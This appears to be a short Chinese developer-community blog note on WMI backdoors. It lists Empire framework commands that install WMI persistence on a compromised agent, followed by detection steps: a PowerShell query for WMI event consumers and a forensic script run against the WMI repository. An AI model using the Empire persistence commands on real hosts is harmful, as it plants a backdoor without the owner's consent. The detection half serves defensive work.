开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

社区首页 >专栏 >Empire-WMI型后门

Empire-WMI型后门

原创

作者头像

浪子云

修改于 2022-09-13 09:41:06

6190

修改于 2022-09-13 09:41:06

举报

文章被收录于专栏：子云笔记子云笔记

usemodule powershell/persistence/elevated/wmi
set Agent 91AT5M4V
set Listener test
execute


检查目标主机的情况
powershell:Get-WmiObject -Namespace root\subscription -class commandlineeventconsumer


https://github.com/davidpany/WMI_Forensics.git
WMI 存储库:%windir%\System32\Wbem\Repository---->OBJECTS.DATA

python2 PyWMIPersistenceFinder.py OBJECTS.DATA

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

评论

登录后参与评论

0 条评论

热度

最新

LV.